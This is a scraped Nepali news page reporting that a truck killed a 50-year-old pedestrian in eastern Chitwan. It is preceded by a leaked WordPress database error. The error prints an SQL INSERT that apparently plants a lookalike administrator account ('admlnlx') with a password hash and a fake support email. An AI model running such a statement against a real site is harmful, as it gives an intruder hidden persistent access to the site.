WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxvLLsEtGLXo.6.6axntlEvxhLZSJZ1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-28 04:36:05', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर २० – पूर्वी चितवनको जयमङ्गलामा ट्रकको ठक्करबाट आज बिहान पैदलयात्री स्थानीयवासी ५० वर्षीय राजकुमार परियारको निधन भएको छ ।
रत्ननगर–११ जयमङ्गलवाबाट टाँडीतर्फ आउँदै गरेको ना२ख ४९७१ नंको ट्रकले ठक्कर दिँदा उनको घटनास्थलमा नै मृत्यु भएको जिल्ला प्रहरी कार्यालय चितवनले जनाएको छ । ठक्कर दिने ट्रक र त्यसका चालकलाई इलाका प्रहरी कार्यालय टाँडीले नियन्त्रणमा लिएको छ । शव परीक्षणका लागि भरतपुर अस्पताल ल्याइँदै गरेको बताइएको छ । – रासस